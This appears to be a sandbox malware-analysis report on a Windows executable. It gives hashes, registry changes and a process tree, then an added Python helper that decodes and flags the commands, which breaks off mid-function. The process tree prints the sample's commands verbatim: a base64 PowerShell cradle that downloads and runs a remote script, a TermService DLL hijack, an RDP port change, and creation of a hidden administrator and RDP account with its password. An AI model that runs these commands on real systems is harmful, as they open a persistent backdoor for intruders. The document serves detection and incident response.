Analysis
- max time kernel: 48s
- max time network: 125s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 16-06-2021 10:08

Static task: static1
Behavioral task: behavioral1
- Sample: 6efc7601be401f3e9b49f4f2cf63fee9.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: 6efc7601be401f3e9b49f4f2cf63fee9.exe
- Resource: win10v20210410

General
- Target: 6efc7601be401f3e9b49f4f2cf63fee9.exe
- Size: 6.0MB
- MD5: 6efc7601be401f3e9b49f4f2cf63fee9
- SHA1: 6c975b9f64a3e0840c43f11571bc4b1bccdc3d83
- SHA256: 9d2a3042c4e2d68df7a39cd7efae7c64f2b7ed5ae507bac9282e154591757724
- SHA512: 87998010dd888280388f65637945aca1c641c45ad482d9abb193b1f00c5838aff22dcec68c695feb357dab26f536edd8364640cda4814de461c506b1ff288c7a
Malware Config
- Extracted URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1 (the base64 -enc argument of the last powershell.exe in the process tree decodes to IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"))
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes (flow → pid, process):
- flows 13, 15, 16, 17, 19, 21, 23, 25, 27 → PID 1252 powershell.exe
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Yara matches (resource → rule):
- \Windows\Branding\mediasrv.png → upx
- \Windows\Branding\mediasvc.png → upx
Loads dropped DLL 2 IoCs
Processes:
- PID 3488 (process name not captured in the report)
Drops file in Program Files directory 4 IoCs
Processes (powershell.exe):
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
- File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
- File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
Drops file in Windows directory 19 IoCs
Processes (powershell.exe, two instances). The ServiceProfiles\NetworkService paths show that these PowerShell instances run as NT AUTHORITY\NETWORK SERVICE; the __PSScriptPolicyTest_*.ps1/.psm1 files are PowerShell's own AppLocker/WDAC policy probe, not sample content.
- File created: C:\Windows\branding\wupsvc.jpg
- File opened for modification: C:\Windows\branding\mediasvc.png
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA473.tmp
- File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
- File created: C:\Windows\branding\mediasvc.png
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4C3.tmp
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA504.tmp
- File opened for modification: C:\Windows\branding\Basebrd
- File opened for modification: C:\Windows\branding\ShellBrd
- File opened for modification: C:\Windows\branding\mediasrv.png
- File opened for modification: C:\Windows\branding\wupsvc.jpg
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jgcka5tz.dwz.ps1
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1d3043kd.q33.psm1
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA493.tmp
- File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4F3.tmp
- File created: C:\Windows\branding\mediasrv.png
- File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe unless marked WMIC.exe. Every key below sits under \REGISTRY\USER\S-1-5-20, the profile hive of NT AUTHORITY\NETWORK SERVICE, which is the account these processes run as; the writes themselves are the stock Internet Settings / SystemCertificates initialisation that WinINet and the certificate store perform the first time a profile uses them.
- Key created: Software\Policies\Microsoft\SystemCertificates\CA\CTLs
- Key created: Software\Microsoft\SystemCertificates\Disallowed
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"
- Key created: Software\Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"
- Key created: Software\Policies\Microsoft\SystemCertificates\trust\CRLs
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"
- Key created: Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
- Key created: Software\Microsoft\SystemCertificates\trust
- Key created: Software\Microsoft\SystemCertificates\trust\Certificates
- Key created: Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
- Set value (str): Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"
- Key created: Software\Microsoft
- Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
- Key created: Software\Microsoft\SystemCertificates\Root
- Key created: Software\Microsoft\SystemCertificates\SmartCardRoot
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ (default value)
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
- Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
- Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Key created: Software\Classes\Local Settings\MuiCache
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
- Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ (default value)
- Key created: Software\Microsoft\Advanced INF Setup
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"
- Set value (data): Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ (default value)
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"
- Key created: Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Key created: Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"
- Set value (int): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"
- Key created: SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache
- Set value (str): Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes (flow → HTTP User-Agent header):
- flow 15: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- flow 17: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes (pid, process; in the order reported):
- 2808 powershell.exe (×3)
- 1156 powershell.exe (×3)
- 1832 powershell.exe (×3)
- 3024 powershell.exe (×3)
- 2808 powershell.exe (×3)
- 1252 powershell.exe (×3)
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
- PID 612 (process name not captured in the report), 2 occurrences
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes (pid, process → privileges enabled in the token):
- 2808 powershell.exe → SeDebugPrivilege
- 1156 powershell.exe → SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- 1832 powershell.exe → the same 22 entries as 1156
- 3024 powershell.exe → the same list as 1156 through SeManageVolumePrivilege and 33 (the report's 64-entry cap cuts it there)
Entries 33 to 36 are privilege LUIDs the sandbox did not resolve to names. Enabling every privilege already present in the token is what an elevated process does with AdjustTokenPrivileges; it shows the process is running with a full administrator token, not that it escalated to get one.
Suspicious use of WriteProcessMemory 64 IoCs
Processes (parent pid, image → child pid, image; every pair appears twice in the report and is listed once here):
- 3896 6efc7601be401f3e9b49f4f2cf63fee9.exe → 2808 powershell.exe
- 2808 powershell.exe → 4068 csc.exe
- 4068 csc.exe → 2284 cvtres.exe
- 2808 powershell.exe → 1156 powershell.exe
- 2808 powershell.exe → 1832 powershell.exe
- 2808 powershell.exe → 3024 powershell.exe
- 2808 powershell.exe → 3900 reg.exe
- 2808 powershell.exe → 2104 reg.exe
- 2808 powershell.exe → 1916 reg.exe
- 2808 powershell.exe → 2084 net.exe
- 2084 net.exe → 2724 net1.exe
- 2808 powershell.exe → 2284 cmd.exe
- 2284 cmd.exe → 3796 cmd.exe
- 3796 cmd.exe → 2664 net.exe
- 2664 net.exe → 2088 net1.exe
- 2808 powershell.exe → 2352 cmd.exe
- 2352 cmd.exe → 4052 cmd.exe
- 4052 cmd.exe → 3924 net.exe
- 3924 net.exe → 1832 net1.exe
- 2124 cmd.exe → 2104 net.exe
- 2104 net.exe → 4040 net1.exe
- 1804 cmd.exe → 3872 net.exe
- 3872 net.exe → 2144 net1.exe
- 3644 cmd.exe → 3908 net.exe
- 3908 net.exe → 2388 net1.exe
- 1516 cmd.exe → 2804 net.exe
- 2804 net.exe → 2104 net1.exe
- 4040 cmd.exe → 1240 net.exe
- 1240 net.exe → 3808 net1.exe
- 2144 cmd.exe → 188 net.exe
- 188 net.exe → 2664 net1.exe
- 3004 cmd.exe → 2064 WMIC.exe
PIDs are recycled within the run (2284 is cvtres.exe and later cmd.exe; 2104 is reg.exe, net.exe and net1.exe; 1832 is powershell.exe and net1.exe), so correlate on the parent/child pair and image name rather than on PID alone.
Processes
Indentation shows depth in the tree (the report's 1⤵ to 6⤵ markers). Each entry gives the image path, then its command line, then the signatures that fired on it.

C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe
  cmd: "C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdline"
      - Suspicious use of WriteProcessMemory
      (csc.exe with cvtres.exe beneath powershell.exe is what Add-Type produces when it compiles inline C#; the kuijob3s.* files it leaves behind are listed under Downloads)
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D27.tmp" "c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMP"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\reg.exe
      cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      (moves the RDP listener from the default 3389 to 0x1C21 = 7201)
    C:\Windows\system32\reg.exe
      cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
      (points the Remote Desktop Services host DLL, normally %SystemRoot%\System32\termsrv.dll, at the dropped UPX-packed DLL that carries a .png name)
    C:\Windows\system32\reg.exe
      cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      (turns off the WDDM display driver for Remote Desktop sessions)
    C:\Windows\system32\net.exe
      cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe
        cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe
        cmd: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net.exe
          cmd: net start rdpdr
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 start rdpdr
    C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe
        cmd: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net.exe
          cmd: net start TermService
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\net1.exe
            cmd: C:\Windows\system32\net1 start TermService
    C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    C:\Windows\system32\cmd.exe
      cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

The trees below start at depth 1 with no recorded parent. They run after TermService is restarted with the replaced ServiceDLL, and the registry writes they trigger (the WMIC.exe entries under "Modifies data under HKEY_USERS") land in the S-1-5-20 NETWORK SERVICE hive, which is consistent with the hijacked service spawning them; the report itself does not show the parent.

C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    cmd: net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user WgaUtilAcc IUni1mTF /add
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    cmd: net.exe user WgaUtilAcc IUni1mTF /add
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 user WgaUtilAcc IUni1mTF /add
C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    cmd: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    cmd: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    cmd: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
  cmd: cmd /C net.exe user WgaUtilAcc IUni1mTF
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe
    cmd: net.exe user WgaUtilAcc IUni1mTF
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 user WgaUtilAcc IUni1mTF
C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\Wbem\WMIC.exe
    cmd: wmic path win32_VideoController get name
    - Modifies data under HKEY_USERS
C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C wmic CPU get NAME
  C:\Windows\System32\Wbem\WMIC.exe
    cmd: wmic CPU get NAME
    - Modifies data under HKEY_USERS
C:\Windows\System32\cmd.exe
  cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  C:\Windows\system32\cmd.exe
    cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      (the -enc argument is base64 over UTF-16LE and decodes to IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config)
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
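The following Python is an added triage helper, not part of the Triage report and not code from the sample. It does two things a responder wants from this tree: it decodes the -enc payload of the last powershell.exe (base64 over UTF-16LE, which is why the argument is full of "A" characters) and it runs plain command-line checks over the reg.exe / net.exe / powershell.exe lines above, flagging the RDP listener moved to 0x1C21 (7201), the TermService ServiceDLL pointed at a non-.dll path, the policy write under Terminal Services, and the accounts and group memberships added with net.exe. Only ENC_B64 and REPORT_COMMANDS are copied from the report; the rule names, the cmd /c unwrapping and the thresholds are the example's own.

```python
"""Added example (not from the Triage report or the sample): decode PowerShell
-EncodedCommand payloads and flag the RDP / local-account changes in the process
tree above. Only ENC_B64 and REPORT_COMMANDS are copied from the report."""
import base64
import re

# Base64 argument of the last powershell.exe in the tree (copied from the report).
ENC_B64 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"

# Command lines copied from the process tree above, nested cmd /c wrappers included.
REPORT_COMMANDS = [
    '"powershell.exe" -ep bypass & ' + r"'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'",
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r'"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService',
    "cmd /C net.exe user WgaUtilAcc 000000 /del",
    "cmd /C net.exe user WgaUtilAcc IUni1mTF /add",
    'cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    'cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD',
    'cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    "cmd /C net.exe user WgaUtilAcc IUni1mTF",
    "cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENC_B64,
]

_TOKEN_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\S+)')
_CMD_WRAPPER_RE = re.compile(r'^\s*(?:"(?:[^"]*\\)?)?cmd(?:\.exe)?"?\s+/[ck]\s+(.*)$', re.I | re.S)
_URL_RE = re.compile(r'https?://[^\s"\')]+', re.I)
_CRADLE_WORDS = ("downloadstring", "downloadfile", "invoke-expression", "iex", "invoke-webrequest", "net.webclient")

def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE text; restore '=' padding if it was stripped."""
    b64 = b64.strip()
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le")

def tokenize(cmd):
    """Split a Windows command line on whitespace, keeping quoted arguments whole (quotes removed)."""
    return [a or b or c for a, b, c in _TOKEN_RE.findall(cmd)]

def analyze(cmd):
    """Return a list of (label, detail) findings for one command line."""
    wrapped = _CMD_WRAPPER_RE.match(cmd)
    if wrapped:                                   # peel "cmd /c ..." layers (the report nests two)
        return analyze(wrapped.group(1))
    toks = tokenize(cmd)
    if not toks:
        return []
    low = [t.lower() for t in toks]
    exe = low[0].rsplit("\\", 1)[-1]
    findings = []
    if exe in ("powershell.exe", "powershell", "pwsh.exe", "pwsh"):
        for i in range(1, len(toks)):
            key, nxt = low[i].lstrip("-/"), (low[i + 1] if i + 1 < len(toks) else "")
            # powershell.exe takes -ExecutionPolicy as -ex/-ep and -EncodedCommand as any prefix (-e, -ec, -enc)
            if key in ("ep", "ex") or (len(key) >= 3 and "executionpolicy".startswith(key)):
                if nxt == "bypass":
                    findings.append(("execution_policy_bypass", None))
            elif key and "encodedcommand".startswith(key) and nxt:
                try:
                    decoded = decode_encoded_command(toks[i + 1])
                except ValueError:                # not base64 / not UTF-16: record it and move on
                    findings.append(("encoded_command_undecodable", toks[i + 1][:32]))
                    continue
                findings.append(("encoded_command", decoded))
                if any(w in decoded.lower() for w in _CRADLE_WORDS):
                    url = _URL_RE.search(decoded)
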